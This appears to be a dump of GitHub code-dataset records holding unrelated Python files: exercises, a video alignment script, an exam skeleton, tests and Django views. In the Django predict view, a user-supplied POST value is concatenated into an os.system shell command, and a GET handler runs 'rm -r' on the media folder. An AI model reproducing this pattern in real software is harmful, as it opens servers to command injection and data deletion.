https://apps.timwhitlock.info/emoji/tables/unicode\n\nOriginal: U+1F60D\nModificado: U0001F60D => mantém o U e acrescenta 3 zeros e replica o resto do código.\n\nPara executar 1 vez\n for num in range(1, 11):\n print('\\U0001F60D' * num)\nSe quiser executar 3 vezes\nfor _ 
in range(3):\n for num in range(1, 11):\n print('\\U0001F60D' * num)\n\n\"\"\"\n\n\nfor _ in range(3):\n for num in range(1, 11):\n print('\\U0001F60D' * num)\n","repo_name":"vanderleikoziol/koziol-git1","sub_path":"secao06/emoji.py","file_name":"emoji.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"346030845","text":"import argparse\nimport pandas as pd\nfrom vcsl import *\nfrom torch.utils.data import DataLoader\nfrom loguru import logger\nfrom itertools import product, islice\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--query-file\", \"-Q\", type=str, help=\"data file\")\n parser.add_argument(\"--reference-file\", \"-G\", type=str, help=\"data file\")\n parser.add_argument(\"--pair-file\", type=str, help=\"data file\")\n\n parser.add_argument(\"--input-store\", type=str, help=\"store of input data: oss|local\", default=\"oss\")\n parser.add_argument(\"--input-root\", type=str, help=\"root path of input data\", default=\"\")\n\n parser.add_argument(\"--oss-config\", type=str, default='~/ossutilconfig-copyright', help=\"url path\")\n parser.add_argument(\"--batch-size\", \"-b\", type=int, default=32, help=\"batch size\")\n parser.add_argument(\"--data-workers\", type=int, default=16, help=\"data workers\")\n parser.add_argument(\"--request-workers\", type=int, default=4, help=\"data workers\")\n parser.add_argument(\"--output-root\", type=str, help=\"output root\")\n parser.add_argument(\"--output-store\", type=str, help=\"store of output data: oss|local\")\n\n # Hyper parameters or input model\n parser.add_argument(\"--alignment-method\", type=str, default=\"DTW\", help=\"DTW, DP, TN alignment method\")\n\n parser.add_argument(\"--min-length\", type=int, default=5, help=\"minimum length of one segment\")\n parser.add_argument(\"--sum-sim\", type=float, default=10., help=\"minimum accumulated sim of one segment\")\n parser.add_argument(\"--ave-sim\", type=float, default=0.3, help=\"average sim of one segment\")\n parser.add_argument(\"--min-sim\", type=float, default=0.2, help=\"minimum average sim of one segment\")\n\n parser.add_argument(\"--max-path\", type=int, default=10, help=\"maximum number of paths to predict\")\n parser.add_argument(\"--discontinue\", type=int, default=3, help=\"max discontinue point in path\")\n parser.add_argument(\"--max-iou\", type=float, default=0.3, help=\"max iou to filter bboxes\")\n\n parser.add_argument(\"--diagonal-thres\", type=int, default=10, help=\"threshold for discarding a vertical/horizontal part of a segment for DP\")\n\n parser.add_argument(\"--tn-top-K\", type=int, default=5, help=\"top k nearest for TN\")\n parser.add_argument(\"--tn-max-step\", type=int, default=10, help=\"max step for TN\")\n\n parser.add_argument(\"--spd-model-path\", type=str, help=\"SPD model path\")\n parser.add_argument(\"--device\", type=str, help=\"cpu or cuda:0 or others, only valid to SPD inference\")\n parser.add_argument(\"--spd-conf-thres\", type=float, default=0.5, help=\"bounding box conf filter for SPD inference\")\n\n\n parser.add_argument(\"--params-file\", type=str)\n\n parser.add_argument(\"--result-file\", default=\"pred.json\", type=str, help=\"result path\")\n\n args = parser.parse_args()\n\n pairs, files_dict, query, reference = None, None, None, None\n if args.pair_file:\n df = pd.read_csv(args.pair_file)\n pairs = df[['query_id', 'reference_id']].values.tolist()\n\n data_list = 
[(f\"{p[0]}-{p[1]}\", f\"{p[0]}-{p[1]}\") for p in pairs]\n else:\n query = pd.read_csv(args.query_file)\n query = query[['uuid']].values.tolist()\n\n reference = pd.read_csv(args.reference_file)\n reference = reference[['uuid']].values.tolist()\n\n pairs = product(query, reference)\n data_list = [(f\"{p[0]}-{p[1]}\", f\"{p[0]}-{p[1]}\") for p in pairs]\n\n config = dict()\n if args.input_store == 'oss':\n config['oss_config'] = args.oss_config\n\n dataset = ItemDataset(data_list,\n store_type=args.input_store,\n data_type=DataType.NUMPY.type_name,\n root=args.input_root,\n trans_key_func=lambda x: x + '.npy',\n **config)\n\n logger.info(f\"Data to run {len(dataset)}\")\n\n loader = DataLoader(dataset, collate_fn=lambda x: x,\n batch_size=args.batch_size,\n num_workers=args.data_workers)\n\n model_config = dict()\n if args.alignment_method.startswith('DTW'):\n model_config = dict(\n discontinue=args.discontinue,\n min_sim=args.min_sim,\n min_length=args.min_length,\n max_iou=args.max_iou\n )\n elif args.alignment_method.startswith('TN'):\n model_config = dict(\n tn_max_step=args.tn_max_step, tn_top_k=args.tn_top_K, max_path=args.max_path,\n min_sim=args.min_sim, min_length=args.min_length, max_iou=args.max_iou\n )\n elif args.alignment_method.startswith('DP'):\n model_config = dict(discontinue=args.discontinue,\n min_sim=args.min_sim,\n ave_sim=args.ave_sim,\n min_length=args.min_length,\n diagonal_thres=args.diagonal_thres)\n elif args.alignment_method.startswith('HV'):\n model_config = dict(min_sim=args.min_sim, iou_thresh=args.max_iou)\n elif args.alignment_method.startswith('SPD'):\n model_config = dict(model_path=args.spd_model_path,\n conf_thresh=args.spd_conf_thres,\n device=args.device)\n else:\n raise ValueError(f\"Unknown VTA method: {args.alignment_method}\")\n\n # override model config with param file\n if args.params_file:\n reader = build_reader(args.input_store, DataType.JSON.type_name, **config)\n param_result = reader.read(args.params_file)\n best_params = param_result['best']\n logger.info(\"best param {}\", best_params)\n model_config = best_params['param']\n\n model = build_vta_model(method=args.alignment_method, concurrency=args.request_workers, **model_config)\n\n total_result = dict()\n for batch_data in islice(loader, 0, None):\n logger.info(\"data cnt: {}, {}\", len(batch_data), batch_data[0][0])\n batch_result = model.forward_sim(batch_data)\n logger.info(\"result cnt: {}\", len(batch_result))\n\n for pair_id, result in batch_result:\n total_result[pair_id] = result\n\n output_store = args.input_store if args.output_store is None else args.output_store\n if output_store == 'local' and not os.path.exists(args.output_root):\n os.makedirs(args.output_root, exist_ok=True)\n writer = build_writer(output_store, DataType.JSON.type_name, **config)\n writer.write(os.path.join(args.output_root, args.result_file), total_result)\n","repo_name":"ant-research/VCSL","sub_path":"run_video_vta.py","file_name":"run_video_vta.py","file_ext":"py","file_size_in_byte":6503,"program_lang":"python","lang":"en","doc_type":"code","stars":96,"dataset":"github-code","pt":"16"} +{"seq_id":"23300989922","text":"# Skeleton Program for the AQA AS1 Summer 2020 examination\r\n# this code should be used in conjunction with the Preliminary Material\r\n# written by the AQA AS1 Programmer Team\r\n# developed in a Python 3 environment\r\n\r\n# Version number: 0.0.0\r\n\r\nEMPTY_STRING = \"\"\r\nMAX_WIDTH = 100\r\nMAX_HEIGHT = 100\r\n\r\nclass FileHeader:\r\n \"\"\"\r\n Parameters: self\r\n Description: 
Creates an object with a title, width, height and filetype\r\n \"\"\"\r\n def __init__(self):\r\n self.Title = EMPTY_STRING\r\n self.Width = MAX_WIDTH\r\n self.Height = MAX_HEIGHT\r\n self.FileType = EMPTY_STRING \r\n\r\ndef DisplayError(ErrorMessage):\r\n \"\"\"\r\n Parameters: String\r\n Description: Takes in a string as an error message displays it\r\n \"\"\"\r\n print(\"Error: \", ErrorMessage)\r\n\r\ndef PrintHeading(Heading):\r\n \"\"\"\r\n Parameters: String\r\n Description: Displays the heading underlined with equal symbols\r\n \"\"\"\r\n print(Heading)\r\n HeadingLength = len(Heading)\r\n for Position in range(1, HeadingLength + 1):\r\n print('=', end='')\r\n print()\r\n\r\ndef DisplayImage(Grid, Header):\r\n \"\"\"\r\n Parameters: List, Object\r\n Description: Prints image heading, then prints/displays the image\r\n \"\"\"\r\n print()\r\n PrintHeading(Header.Title)\r\n for ThisRow in range(Header.Height):\r\n for ThisColumn in range(Header.Width):\r\n print(Grid[ThisRow][ThisColumn], end='')\r\n print()\r\n\r\ndef SaveImage(Grid, Header):\r\n \"\"\"\r\n Parameters: 2D list, Object\r\n Description: \r\n \"\"\"\r\n print(\"The current title of your image is: \" + Header.Title)\r\n Answer = input(\"Do you want to use this as your filename? (Y/N) \")\r\n if Answer == \"N\" or Answer == \"n\":\r\n FileName = input(\"Enter a new filename: \")\r\n else:\r\n FileName = Header.Title\r\n FileOut = open(FileName + \".txt\", 'w')\r\n FileOut.write(Header.Title + '\\n')\r\n for Row in range(Header.Height):\r\n for Column in range(Header.Width):\r\n FileOut.write(Grid[Row][Column])\r\n FileOut.write('\\n')\r\n FileOut.close()\r\n\r\ndef EditImage(Grid, Header):\r\n \"\"\"\r\n Parameters: 2D List, Object\r\n Return Type: 2D List\r\n Description: Allows user to edit the image by changing one of the symbols to another \r\n \"\"\"\r\n DisplayImage(Grid, Header)\r\n Answer = EMPTY_STRING\r\n while Answer != \"N\":\r\n Symbol = EMPTY_STRING\r\n NewSymbol = EMPTY_STRING\r\n while len(Symbol) != 1:\r\n Symbol = input(\"Enter the symbol you want to replace: \")\r\n while len(NewSymbol) != 1:\r\n NewSymbol = input(\"Enter the new symbol: \")\r\n for ThisRow in range(Header.Height):\r\n for ThisColumn in range(Header.Width):\r\n if Grid[ThisRow][ThisColumn] == Symbol:\r\n Grid[ThisRow][ThisColumn] = NewSymbol\r\n DisplayImage(Grid, Header)\r\n Answer = input(\"Do you want to make any further changes? 
(Y/N) \")\r\n return Grid\r\n\r\ndef ConvertChar(PixelValue):\r\n \"\"\"\r\n Parameters: Integer\r\n Return Type: String\r\n Description: Returns a character based on the value of the pixel put in\r\n \"\"\"\r\n if PixelValue <= 32:\r\n AsciiChar = '#'\r\n elif PixelValue <= 64:\r\n AsciiChar = '&'\r\n elif PixelValue <= 96:\r\n AsciiChar = '+'\r\n elif PixelValue <= 128:\r\n AsciiChar = ';'\r\n elif PixelValue <= 160:\r\n AsciiChar = ':'\r\n elif PixelValue <= 192:\r\n AsciiChar = ','\r\n elif PixelValue <= 224:\r\n AsciiChar = '.'\r\n else:\r\n AsciiChar = ' '\r\n return AsciiChar\r\n\r\ndef LoadGreyScaleImage(FileIn, Grid, Header):\r\n \"\"\"\r\n Parameters: String, 2D List, Object\r\n Return Type: 2D List\r\n Description: Loads an image using each pixel and a specific code assigned to each pixel\r\n \"\"\"\r\n try:\r\n for Row in range(Header.Height):\r\n for Column in range(Header.Width):\r\n NextPixel = FileIn.readline()\r\n PixelValue = int(NextPixel)\r\n Grid[Row][Column] = ConvertChar(PixelValue)\r\n except:\r\n DisplayError(\"Image data error\") \r\n return Grid\r\n \r\ndef LoadAsciiImage(FileIn, Grid, Header):\r\n \"\"\"\r\n Parameters: String, 2D List, Object\r\n Return Type: 2D List\r\n Description: Loads an image using the width and height of the heading as dimensions\r\n \"\"\"\r\n try:\r\n ImageData = FileIn.readline()\r\n NextChar = 0\r\n for Row in range(Header.Height):\r\n for Column in range(Header.Width):\r\n Grid[Row][Column] = ImageData[NextChar]\r\n NextChar += 1\r\n except:\r\n DisplayError(\"Image data error\")\r\n return Grid\r\n\r\ndef LoadFile(Grid, Header):\r\n \"\"\"\r\n Parameters: 2D List, Object\r\n Return Type: 2D List, Object\r\n Description: Opens the file in read mode, and then splits each line into fields and loads an asciiImage or greyscaleimage as the grid depending on the filetype of the header, and then checks if the file exists, and finally returns the grid\r\n \"\"\"\r\n FileFound = False\r\n FileTypeOK = False\r\n FileName = input(\"Enter filename to load: \")\r\n try:\r\n FileIn = open(FileName + \".txt\", 'r')\r\n FileFound = True\r\n HeaderLine = FileIn.readline()\r\n Fields = HeaderLine.split(',')\r\n Header.Title = Fields[0]\r\n Header.Width = int(Fields[1])\r\n Header.Height = int(Fields[2])\r\n Header.FileType = Fields[3]\r\n Header.FileType = Header.FileType[0]\r\n if Header.FileType == 'A': \r\n Grid = LoadAsciiImage(FileIn, Grid, Header)\r\n FileTypeOK = True\r\n elif Header.FileType == 'G': \r\n Grid = LoadGreyScaleImage(FileIn, Grid, Header)\r\n FileTypeOK = True\r\n FileIn.close()\r\n if not FileTypeOK:\r\n DisplayError(\"Unknown file type\")\r\n else:\r\n DisplayImage(Grid, Header)\r\n except:\r\n if not FileFound:\r\n DisplayError(\"File not found\")\r\n else:\r\n DisplayError(\"Unknown error\")\r\n return Grid, Header\r\n\r\ndef SaveFile(Grid, Header):\r\n \"\"\"\r\n Parameters: 2D List, Object\r\n Description: Opens a file required by the user in write mode, then writes each field to the file separated by commas, and also writes the grid to the file, and then closes it\r\n \"\"\"\r\n FileName = input(\"Enter filename: \")\r\n FileOut = open(FileName + \".txt\", 'w')\r\n FileOut.write(Header.Title + ',' + str(Header.Width) + ',' + str(Header.Height) + ',' + 'A' + '\\n')\r\n for Row in range(Header.Height):\r\n for Column in range(Header.Width):\r\n FileOut.write(Grid[Row][Column])\r\n FileOut.close()\r\n\r\ndef ClearGrid(Grid):\r\n \"\"\"\r\n Parameters: 2D List\r\n Return Type: 2D List\r\n Description: Clears the grid by 
replacing each pixel with a . and returns it\r\n \"\"\"\r\n for Row in range(MAX_HEIGHT):\r\n for Column in range(MAX_WIDTH):\r\n Grid[Row][Column] = '.'\r\n return Grid\r\n \r\ndef DisplayMenu():\r\n \"\"\"\r\n Description: Displays the main menu screen\r\n \"\"\"\r\n print()\r\n print(\"Main Menu\")\r\n print(\"=========\")\r\n print(\"L - Load graphics file\") \r\n print(\"D - Display image\")\r\n print(\"E - Edit image\")\r\n print(\"S - Save image\")\r\n print(\"X - Exit program\") \r\n print()\r\n\r\ndef GetMenuOption():\r\n \"\"\"\r\n Return Type: String\r\n Description: Asks the user to enter their menu option and returns it\r\n \"\"\"\r\n MenuOption = EMPTY_STRING\r\n while len(MenuOption) != 1:\r\n MenuOption = input(\"Enter your choice: \")\r\n return MenuOption\r\n \r\ndef Graphics():\r\n \"\"\"\r\n Description: Displays the menu, then asks for a menu option, then does the according function depending on the user's selected option, then saves the file\r\n \"\"\"\r\n Grid = [['' for Column in range(MAX_WIDTH)] for Row in range(MAX_HEIGHT)]\r\n Grid = ClearGrid(Grid)\r\n Header = FileHeader()\r\n ProgramEnd = False\r\n while not ProgramEnd:\r\n DisplayMenu()\r\n MenuOption = GetMenuOption()\r\n if MenuOption == 'L':\r\n Grid, Header = LoadFile(Grid, Header)\r\n elif MenuOption == 'D':\r\n DisplayImage(Grid, Header) \r\n elif MenuOption == 'E':\r\n Grid = EditImage(Grid, Header) \r\n elif MenuOption == 'S': \r\n SaveImage(Grid, Header)\r\n elif MenuOption == 'X':\r\n ProgramEnd = True\r\n else:\r\n print(\"You did not choose a valid menu option. Try again\")\r\n print(\"You have chosen to exit the program\")\r\n Answer = input(\"Do you want to save the image as a graphics file? (Y/N) \")\r\n if Answer == \"Y\" or Answer == \"y\":\r\n SaveFile(Grid, Header)\r\n \r\nif __name__ == \"__main__\":\r\n Graphics() \r\n","repo_name":"Usman198316/Programming-Challenges","sub_path":"2020 Pre-Release/A-level_Computer Science_Computer Science (7517)_Preliminary Material_AS_June 2020 (to be used in autumn 2020)_Python 3_Paper1_AS_2020_Python3_Pub_0.0.0.py","file_name":"A-level_Computer Science_Computer Science (7517)_Preliminary Material_AS_June 2020 (to be used in autumn 2020)_Python 3_Paper1_AS_2020_Python3_Pub_0.0.0.py","file_ext":"py","file_size_in_byte":8094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"5079137045","text":"from django.http import HttpResponse \nfrom django.shortcuts import render, redirect\nimport os\nfrom home import forms\nfrom django.views.generic import TemplateView\nimport os\n\nclass Index(TemplateView):\n template_name = 'home/index.html'\n\ndef ShipDetection_view(request):\n if request.method == 'POST': \n form = forms.ShipForm(request.POST, request.FILES) \n \n if form.is_valid(): \n form.save() \n scale = request.POST.get(\"scale\")\n return predict(request, scale)\n else:\n print(os.getcwd())\n os.system('rm -r ./media/images/')\n form = forms.ShipForm() \n return render(request, 'home/im.html', {'form' : form}) \n\n \ndef predict(request, scale): \n path = os.getcwd()\n\n ls = os.listdir('./media/images/')\n os.chdir(path + '/home/model/SIH5/model/darknet/')\n os.system('python3 r3unfile.py ' + path + '/media/images/' + str(ls[0] + ' ' + path) + ' ' + str(scale))\n os.chdir(path + '/')\n return render(request, 'home/display_images.html')\n\n\ndef Upload(request):\n image = request.POST.get('image')\n print(type(image))\n return render(request, 'home/upload_image.html')\n\ndef 
display_ship_images(request): \n \n if request.method == 'GET': \n return render(request, 'home/display_images.html')\n","repo_name":"himdhiman/SIH-2020-Ship_Detection-Project-ISRO","sub_path":"home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"2648627903","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 20 17:52:01 2014\n\n@author: namm\n\"\"\"\nimport sys\nsys.path.append(\"..\")\nfrom agente_prospector.agente.controlo import Controlo\n\nfrom agente_prospector.controlo_react.reaccoes.reaccao_avancar import ReaccaoAvancar\n\n\nclass ControloReact(Controlo):\n \n def __init__(self):\n self._reaccao = ReaccaoAvancar()\n \n def processar(self, percepcao):\n accao = self._reaccao.activar(percepcao)\n return accao\n \n","repo_name":"jorge-ribamar/IASA","sub_path":"src/agente_prospector/controlo_react/controlo_react.py","file_name":"controlo_react.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"11216205358","text":"import matplotlib.pyplot as plt\n\n\nclass VisualizePlays(object):\n def __init__(self, *agents, alpha=0.8):\n \"\"\"\n create a visualization method\n Args:\n agents (object): trained q-learning agent\n \"\"\"\n self.agents = agents\n self.aplpha = alpha\n self.x_label = \"#episodes\"\n\n def plot_reward(self):\n \"\"\"_summary_\"\"\"\n\n plt.title(\"Reward over time per episode\")\n for i, agent in enumerate(self.agents):\n plt.plot(\n agent.rewards,\n c=agent.color,\n label=agent.name,\n linewidth=1,\n linestyle=\"-\",\n alpha=self.aplpha,\n )\n plt.xlabel(self.x_label)\n plt.ylabel(\"Reward\")\n plt.grid()\n plt.legend(\n loc=\"upper center\",\n bbox_to_anchor=(0.5, -0.05),\n fancybox=True,\n shadow=True,\n ncol=1,\n )\n\n def plot_epsilon(self):\n \"\"\"_summary_\"\"\"\n\n # 2\n plt.title(\"Exploration parameter epsilon per episode\")\n for i, agent in enumerate(self.agents):\n plt.plot(\n agent.epsilons,\n c=agent.color,\n label=agent.name,\n linewidth=1,\n linestyle=\"-\",\n alpha=self.aplpha,\n )\n plt.xlabel(self.x_label)\n plt.ylabel(\"Epsilon\")\n plt.grid()\n plt.legend(\n loc=\"upper center\",\n bbox_to_anchor=(0.5, -0.05),\n fancybox=True,\n shadow=True,\n ncol=1,\n )\n\n def plot_last_agent_state(self):\n \"\"\"_summary_\"\"\"\n plt.title(\"Last state the agent is standing on at the end of the episode\")\n for i, agent in enumerate(self.agents):\n plt.plot(\n agent.last_states,\n c=agent.color,\n label=agent.name,\n linewidth=1,\n linestyle=\"-\",\n alpha=self.aplpha,\n )\n plt.xlabel(self.x_label)\n plt.ylabel(\"last state number\")\n plt.grid()\n plt.legend(\n loc=\"upper center\",\n bbox_to_anchor=(0.5, -0.05),\n fancybox=True,\n shadow=True,\n ncol=1,\n )\n\n def plot_q_values(self):\n \"\"\"_summary_\"\"\"\n plt.title(\"Average of the value of the q-table\")\n for i, agent in enumerate(self.agents):\n plt.plot(\n agent.q_averages,\n c=agent.color,\n label=agent.name,\n linewidth=1,\n linestyle=\"-\",\n alpha=self.aplpha,\n )\n plt.xlabel(self.x_label)\n plt.ylabel(\"q-table average values\")\n plt.grid()\n plt.legend(\n loc=\"upper center\",\n bbox_to_anchor=(0.5, -0.05),\n fancybox=True,\n shadow=True,\n ncol=1,\n )\n\n def plot(self):\n \"\"\"_summary_\"\"\"\n\n plt.figure(figsize=(10, 20))\n\n plt.subplot(4, 1, 1)\n self.plot_reward()\n\n plt.subplot(4, 1, 2)\n self.plot_epsilon()\n\n plt.subplot(4, 1, 3)\n 
self.plot_last_agent_state()\n\n plt.subplot(4, 1, 4)\n self.plot_q_values()\n\n plt.tight_layout()\n plt.show()\n","repo_name":"MauroLuzzatto/Q-Learning-Demo-Play-nChain","sub_path":"helper_functions/visualize_plays.py","file_name":"visualize_plays.py","file_ext":"py","file_size_in_byte":3349,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"2556350229","text":"# user=int(input(\"enter the number :\"))\n# a=2\n# count=0\n# while a>0:\n# b=2\n# while b<a:\n# if a%b==0:\n# break\n# b+=1\n# else:\n# if count==user:\n# print(a)\n# break\n# count+=1\n# a+=1\n\n\n\nuser=input(\"enter sentence\")\nb=user.split()\ni=0\ns=\"\"\nwhile i<len(b):\n if b[i]==b[0]:\n s=s+b[i][0]\n else:\n s=s+\".\"+b[i]\n i=i+1\nprint(s)\n\n\n ","repo_name":"Sindhu983/logic_Q","sub_path":"prime_pstn.py","file_name":"prime_pstn.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"34766192245","text":"\nimport pytest\n\nfrom synse_grpc import api, utils\n\n\n@pytest.mark.parametrize('message,expected', [\n (\n api.V3Tag(\n namespace='vapor',\n label='foo',\n ),\n {\n 'namespace': 'vapor',\n 'annotation': '',\n 'label': 'foo',\n },\n ),\n (\n api.V3WriteData(\n action='foo',\n data=b'bar',\n ),\n {\n 'action': 'foo',\n 'data': b'bar',\n 'transaction': '',\n },\n ),\n (\n api.V3Reading(\n id='123',\n string_value='foo',\n type='test',\n unit=api.V3OutputUnit(\n name='test',\n symbol='T',\n ),\n ),\n {\n 'id': '123',\n 'timestamp': '',\n 'type': 'test',\n 'device_type': '',\n 'device_info': '',\n 'string_value': 'foo',\n 'unit': {\n 'name': 'test',\n 'symbol': 'T',\n },\n 'context': {},\n },\n ),\n (\n api.V3TransactionStatus(\n id='123',\n timeout='5s',\n status=api.DONE,\n ),\n {\n 'id': '123',\n 'created': '',\n 'updated': '',\n 'message': '',\n 'timeout': '5s',\n 'status': 'DONE',\n },\n ),\n (\n api.V3TransactionStatus(\n id='123',\n timeout='5s',\n status=api.DONE,\n context=api.V3WriteData(\n action='foo',\n data=b'bar',\n ),\n ),\n {\n 'id': '123',\n 'created': '',\n 'updated': '',\n 'message': '',\n 'timeout': '5s',\n 'status': 'DONE',\n 'context': {\n 'action': 'foo',\n 'data': b'bar',\n 'transaction': '',\n },\n },\n ),\n (\n api.V3WriteTransaction(\n id='123',\n device='foo',\n timeout='5s',\n ),\n {\n 'id': '123',\n 'device': 'foo',\n 'timeout': '5s',\n },\n ),\n (\n api.V3WriteTransaction(\n id='123',\n device='foo',\n timeout='5s',\n context=api.V3WriteData(\n action='foo',\n data=b'bar',\n ),\n ),\n {\n 'id': '123',\n 'device': 'foo',\n 'timeout': '5s',\n 'context': {\n 'action': 'foo',\n 'data': b'bar',\n 'transaction': '',\n },\n },\n ),\n (\n api.V3WritePayload(\n selector=api.V3DeviceSelector(\n id='123',\n ),\n ),\n {\n 'selector': {\n 'id': '123',\n 'tags': [],\n },\n 'data': [],\n },\n ),\n (\n api.V3WritePayload(\n selector=api.V3DeviceSelector(\n id='123',\n ),\n data=[\n api.V3WriteData(\n action='foo1',\n data=b'bar1',\n ),\n api.V3WriteData(\n action='foo2',\n data=b'bar2',\n ),\n ],\n ),\n {\n 'selector': {\n 'id': '123',\n 'tags': [],\n },\n 'data': [\n {\n 'action': 'foo1',\n 'data': b'bar1',\n 'transaction': '',\n },\n {\n 'action': 'foo2',\n 'data': b'bar2',\n 'transaction': '',\n },\n ],\n },\n ),\n])\ndef test_to_dict(message, expected):\n \"\"\"Convert gRPC messages to their dictionary representations.\"\"\"\n\n assert utils.to_dict(message) == expected\n\n\n@pytest.mark.parametrize('tag,message', [\n ('vapor/foo:bar', 
api.V3Tag(namespace='vapor', annotation='foo', label='bar')),\n ('foo:bar', api.V3Tag(annotation='foo', label='bar')),\n ('vapor/bar', api.V3Tag(namespace='vapor', label='bar')),\n ('bar', api.V3Tag(label='bar')),\n ('', api.V3Tag()),\n])\ndef test_tag_to_message(tag, message):\n \"\"\"Convert a tag string to the V3Tag message.\"\"\"\n\n assert utils.tag_to_message(tag) == message\n\n\n@pytest.mark.parametrize('tag,string', [\n (api.V3Tag(), ''),\n (api.V3Tag(label='foo'), 'foo'),\n (api.V3Tag(namespace='vapor', label='foo'), 'vapor/foo'),\n (api.V3Tag(namespace='vapor', annotation='bar', label='foo'), 'vapor/bar:foo'),\n (api.V3Tag(annotation='bar', label='foo'), 'bar:foo'),\n])\ndef test_tag_string(tag, string):\n \"\"\"Convert a V3Tag to its corresponding tag string.\"\"\"\n\n assert utils.tag_string(tag) == string\n\n\n@pytest.mark.parametrize('data,messages', [\n (\n {},\n [api.V3WriteData()]\n ),\n (\n [{}],\n [api.V3WriteData()]\n ),\n (\n {'action': 'foo'},\n [api.V3WriteData(action='foo')]\n ),\n (\n {'action': 'foo', 'data': 'bar'},\n [api.V3WriteData(action='foo', data=b'bar')]\n ),\n (\n {'action': 'foo', 'data': b'bar'},\n [api.V3WriteData(action='foo', data=b'bar')]\n ),\n (\n {'action': 'foo', 'data': b'bar', 'transaction': '123'},\n [api.V3WriteData(action='foo', data=b'bar', transaction='123')]\n ),\n (\n {'action': 'foo', 'transaction': '123'},\n [api.V3WriteData(action='foo', transaction='123')]\n ),\n (\n [{'action': 'foo'}],\n [api.V3WriteData(action='foo')]\n ),\n (\n [{'action': 'foo', 'data': b'bar'}],\n [api.V3WriteData(action='foo', data=b'bar')]\n ),\n (\n [{'action': 'foo', 'data': b'bar', 'transaction': '123'}],\n [api.V3WriteData(action='foo', data=b'bar', transaction='123')]\n ),\n (\n [{'action': 'foo', 'transaction': '123'}],\n [api.V3WriteData(action='foo', transaction='123')]\n ),\n (\n [\n {'action': 'foo'},\n {'action': 'abc'}\n ],\n [\n api.V3WriteData(action='foo'),\n api.V3WriteData(action='abc'),\n ]\n ),\n (\n [\n {'action': 'foo', 'data': b'bar'},\n {'action': 'abc'}\n ],\n [\n api.V3WriteData(action='foo', data=b'bar'),\n api.V3WriteData(action='abc'),\n ]\n ),\n (\n [\n {'action': 'foo', 'data': b'bar', 'transaction': '123'},\n {'action': 'abc'}\n ],\n [\n api.V3WriteData(action='foo', data=b'bar', transaction='123'),\n api.V3WriteData(action='abc'),\n ]\n ),\n\n])\ndef test_write_data_to_message(data, messages):\n \"\"\"Convert some write data to a V3WriteData message.\"\"\"\n\n assert utils.write_data_to_messages(data) == messages\n\n\n@pytest.mark.parametrize('status,name', [\n (0, 'pending'),\n (1, 'writing'),\n (3, 'done'),\n (4, 'error'),\n])\ndef test_write_status_name(status, name):\n \"\"\"Get the name for the write status value.\"\"\"\n\n assert utils.write_status_name(status) == name\n\n\ndef test_write_status_name_error():\n \"\"\"Get the name for an invalid write status value.\"\"\"\n\n with pytest.raises(ValueError):\n utils.write_status_name(-1)\n\n\n@pytest.mark.parametrize('status,name', [\n (0, 'unknown'),\n (1, 'ok'),\n (2, 'failing'),\n])\ndef test_health_status_name(status, name):\n \"\"\"Get the name for the health status value.\"\"\"\n\n assert utils.health_status_name(status) == name\n\n\ndef test_health_status_name_error():\n \"\"\"Get the name for an invalid health status value.\"\"\"\n\n with pytest.raises(ValueError):\n 
utils.health_status_name(-1)\n","repo_name":"vapor-ware/synse-server-grpc","sub_path":"python/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":7817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"39330632758","text":"import setuptools\n\nwith open(\"README.md\", \"r\", encoding=\"utf-8\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"onedice\",\n version=\"1.0.7\",\n author=\"lunzhiPenxil\",\n author_email=\"lunzhiPenxil@gmail.com\",\n description=\"OneDice offical standard library for Python\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/OlivOS-Team/lib-onedice\",\n packages=setuptools.find_packages(),\n install_requires=[],\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: GNU Affero General Public License v3\",\n \"Operating System :: OS Independent\",\n ],\n)","repo_name":"OlivOS-Team/lib-onedice","sub_path":"python/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"16"} +{"seq_id":"128477091","text":"# Solved on 2022. 3. 5.\n# 5397 키로거\n\nfrom collections import deque\nimport sys\ninput = sys.stdin.readline\n\nT = int(input())\nfor _ in range(T):\n String = input().strip()\n left, right = [], deque()\n for ch in String:\n if ch == '<':\n if left:\n right.appendleft(left.pop())\n elif ch == '>':\n if right:\n left.append(right.popleft())\n elif ch == '-':\n if left:\n left.pop()\n else:\n left.append(ch)\n print(''.join(left) + ''.join(right))\n","repo_name":"gemstoneyang/Algorithm","sub_path":"BOJ/Data_Structure/5397.py","file_name":"5397.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2499039687","text":"import argparse\nfrom seqeval.metrics import classification_report\nfrom seqeval.metrics import accuracy_score\n\nfrom collections import defaultdict # available in Python 2.5 and newer\nfrom sklearn.metrics import confusion_matrix\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport pandas as pd\n\n\ndef read_conllu(file, column):\n fin = open(file)\n sentences = []\n sentence = []\n for line in fin:\n if line.startswith('#'):\n continue\n if line is None or line == '\\n':\n sentences.append(sentence)\n sentence = []\n else:\n columns = line.rstrip().split('\\t')\n if not '.' 
